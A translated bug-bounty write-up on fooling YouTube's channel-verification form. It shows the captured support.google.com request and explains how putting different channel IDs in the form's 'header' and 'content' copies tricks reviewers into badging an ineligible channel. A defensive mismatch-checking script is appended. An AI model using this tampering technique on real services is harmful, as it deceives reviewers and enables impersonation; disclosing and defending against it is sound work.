White-hat stories · 20 September 2024

How to Give a Verification Badge to Any YouTube Channel

Preface

This article shares the story of how a white-hat researcher abroad was able to assign a verification badge to any YouTube channel.

Before the story begins, some background on verification badges is in order:

Verification badges mainly serve to distinguish the genuine accounts of celebrities or companies from potential impersonators, preventing the fraud and impersonation that could otherwise result.

The Story

First, we need a channel with more than 100,000 subscribers, since that is the prerequisite for obtaining the badge.

The Google engineers who designed the system made sure that, to reach the request submission form, a channel with 100,000+ subscribers must be linked to your Google account.

When you do not meet the requirement, you see a prompt like the one in the image below:

[screenshot: ineligibility prompt]

When you do meet it, it looks like the image below:

[screenshot: eligible channel view]

Then click "Apply Now", and the following form is displayed:

[screenshot: application form]

There are 2 fields here:

  • Channel name: the name of the current channel
  • Channel ID: usually found in the URL or at youtube.com/account_advanced

Fill in both fields, then open a proxy tool such as Burp Suite and intercept the request generated when you click "Submit":

POST /apis/cufinsert?v=0&psd=%7B%7D&helpcenter=youtube&hl=en&key=support-content&request_source=1&service_configuration=&mendel_ids=REDACTED HTTP/1.1
Host: support.google.com
Cookie: SUPPORT_CONTENT=REDACTED
Content-Length: 5373
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Brave";v="126"
Content-Type: text/plain;charset=UTF-8
X-Supportcontent-Allowapicookieauth: true
X-Supportcontent-Xsrftoken: REDACTED
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 REDACTED
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.5
Origin: https://support.google.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

{"common_params":{"context_params":{"view_id":REDACTED}},"resource":{"form_id":"channel_verification","header":[{"name":"channel_name","value":"Japan"},{"name":"channel_id","value":"UCPu6Px6WxDjRgUNODpecwLg"},{"name":"subject_line","value":"Channel Verification Application"},{"name":"account_email","value":"redacted@gmail.com"},{"name":"\n\n:---- Automatically added fields ----","value":""},{"name":"Language","value":"en"},{"name":"IIILanguage","value":"en"},{"name":"country_code","value":"REDACTED"},{"name":"auto-helpcenter-id","value":"95"},{"name":"auto-helpcenter-name","value":"youtube"},{"name":"auto-internal-helpcenter-name","value":"youtube"},{"name":"auto-full-url","value":"https://support.google.com/youtube/contact/channel_verification?sjid=REDACTED"},{"name":"auto-user-logged-in","value":"true"},{"name":"auto-user-was-internal","value":"false"},{"name":"IssueType","value":"channel_verification"},{"name":"form-id","value":"channel_verification"},{"name":"form","value":"channel_verification"},{"name":"subject-line-field-id","value":"subject_line"},{"name":"body-text-field-id","value":""},{"name":"AutoDetectedBrowser","value":"Chrome 126.0.0.0"},{"name":"AutoDetectedOS","value":"Intel Mac OS X 10_15_7"},{"name":"MendelExperiments","value":"REDACTED"},{"name":"Form.support-content-visit-id","value":"REDACTED"},{"name":"experiment_0_id","value":""},{"name":"experiment_0_status","value":"OFF"}],"subject":"Channel Verification Application","content":"channel_name: Japan\nchannel_id: UCPu6Px6WxDjRgUNODpecwLg\nsubject_line: Channel Verification Application\naccount_email: redacted@gmail.com\n\n\n:---- Automatically added fields ----: \nLanguage: en\nIIILanguage: en\ncountry_code: REDACTED\nauto-helpcenter-id: 95\nauto-helpcenter-name: youtube\nauto-internal-helpcenter-name: youtube\nauto-full-url: https://support.google.com/youtube/contact/channel_verification?sjid=9325088441159645760-EU\nauto-user-logged-in: true\nauto-user-was-internal: false\nIssueType: 
channel_verification\nform-id: channel_verification\nform: channel_verification\nsubject-line-field-id: subject_line\nbody-text-field-id: \nAutoDetectedBrowser: Chrome 126.0.0.0\nAutoDetectedOS: Intel Mac OS X 10_15_7\nMendelExperiments: REDACTED\nForm.support-content-visit-id: REDACTED\nexperiment_0_id: \nexperiment_0_status: OFF\n","validate_only":false,"validation_info":"CgxjaGFubmVsX25hbWUKCmNoYW5uZWxfaWQKEXZlcmlmaWNhdGlvbl90ZXh0CgxzdWJqZWN0X2xpbmUKDWFjY291bnRfZW1haWw","language":"en","helpcenter_id":"95","active_experiments":"CjRzdWpfdmlkZW9fZXhwZXJpbWVudDo6c3VqX3ZpZGVvX2V4cGVyaW1lbnRfdHJlYXRtZW50","referer":"","referer_title":"","timezone_offset_minutes":420,"form_frd_values":[

The request is roughly as shown above; all cookies and some private information have been removed, so what you see is a simplified version.

Looking at the request body, the first question is why things like subject_line, account_email and many others are supplied client-side at all. The email should be derived from the session cookie, not from a field like this.

Next, look at the body more closely. For some reason, all of the key fields (channel_name, channel_id, etc.) appear twice. This turns out to matter.

The first set of fields, under "header", appears to be intended for the backend; the second, identical set sits under "content".

The purpose of the latter is to let staff see the submitted input so they can verify it and then carry out the next step, which in this case is verifying the channel.

So, how do you get a channel verified that does not meet the requirement?

Very simply: in "header", insert the ID of the ineligible channel, and in "content", after "channel_id:", insert the ID of an eligible channel.

The final "header" section of the request looks like this:

"resource":{"form_id":"channel_verification","header":[{"name":"channel_name","value":"Japan"},{"name":"channel_id","value":"UCPu6Px6WxDjRgUNODpecwLg"},{"name":"subject_line","value":"Channel Verification Application"},

"UCPu6Px6WxDjRgUNODpecwLg" is the ID of a channel with fewer than 100,000 subscribers.

The "content" section reads:

"content":"channel_name: Japan\nchannel_id: UC-9-kyTW8ZkZNDHQJ6FgpwQ\nsubject_line: Channel Verification Application

Here I used "UC-9-kyTW8ZkZNDHQJ6FgpwQ", the ID of the auto-generated "Music" channel (https://youtube.com/channel/UC-9-kyTW8ZkZNDHQJ6FgpwQ).

When Google staff received the request, they saw UC-9-kyTW8ZkZNDHQJ6FgpwQ requesting channel verification, while in reality it was UCPu6Px6WxDjRgUNODpecwLg that was requesting it.

If they went ahead and approved the request, the system would assign the badge to the UCPu6Px6WxDjRgUNODpecwLg channel.
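The defensive counterpart to the mismatch described above, as an added example (not Google's code and not from the original post): a server-side check that parses both copies of the form, flags any key field that differs between "header" and "content", and trusts the account email from the authenticated session rather than the request. The session email, the function names and the sample submission are assumptions constructed to mirror the write-up.

```python
import json

MARKER = ":---- Automatically added fields ----"  # only auto-added fields follow it
# Fields the reviewer decides on; both copies of the form must agree on them.
KEY_FIELDS = ("channel_name", "channel_id", "subject_line")

def header_fields(resource):
    """Structured copy of the form: the list under 'header' as a dict."""
    return {h["name"]: h["value"] for h in resource["header"]}

def content_fields(resource):
    """Reviewer-facing copy: 'key: value' lines under 'content', up to the marker."""
    out = {}
    for line in resource["content"].splitlines():
        if line.startswith(MARKER):
            break
        if ": " in line:
            key, value = line.split(": ", 1)
            out[key] = value
    return out

def check_submission(body, session_email):
    """Return a list of problems; empty means the two copies agree. session_email is
    assumed to come from the authenticated session, not from the request body."""
    resource = json.loads(body)["resource"]
    hdr, txt = header_fields(resource), content_fields(resource)
    problems = [f"{f} differs: header={hdr.get(f)!r} content={txt.get(f)!r}"
                for f in KEY_FIELDS if hdr.get(f) != txt.get(f)]
    if hdr.get("account_email") != session_email:
        problems.append("account_email does not match the session")
    return problems

def canonical_content(resource):
    """Safer design: render the reviewer text from 'header' on the server instead."""
    return "".join(f"{h['name']}: {h['value']}\n" for h in resource["header"])

# Constructed sample mirroring the write-up: the structured channel_id is the
# small channel, while the text the reviewer reads names the eligible one.
SAMPLE = json.dumps({"resource": {"form_id": "channel_verification",
    "header": [{"name": "channel_name", "value": "Japan"},
               {"name": "channel_id", "value": "UCPu6Px6WxDjRgUNODpecwLg"},
               {"name": "subject_line", "value": "Channel Verification Application"},
               {"name": "account_email", "value": "redacted@gmail.com"}],
    "content": "channel_name: Japan\nchannel_id: UC-9-kyTW8ZkZNDHQJ6FgpwQ\n"
               "subject_line: Channel Verification Application\n"
               "account_email: redacted@gmail.com\n\n\n" + MARKER + ": \nLanguage: en\n"}})

if __name__ == "__main__":
    print(check_submission(SAMPLE, "redacted@gmail.com"))
```

Rejecting a submission whose two copies disagree closes the specific gap; dropping the client-supplied "content" copy altogether, as canonical_content does, removes the duplication that made the gap possible.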

The vulnerability was reported a few months ago; the white-hat researcher received a $500 bounty for it, and the badge was allowed to remain.

[screenshot: bounty confirmation]

Did you learn something?

The above was translated and compiled by 骨哥.

Original: https://vojtechcekal.medium.com/how-i-was-able-to-give-verification-badge-to-any-youtube-channel-and-bypass-needed-requirements-b88855afe4b7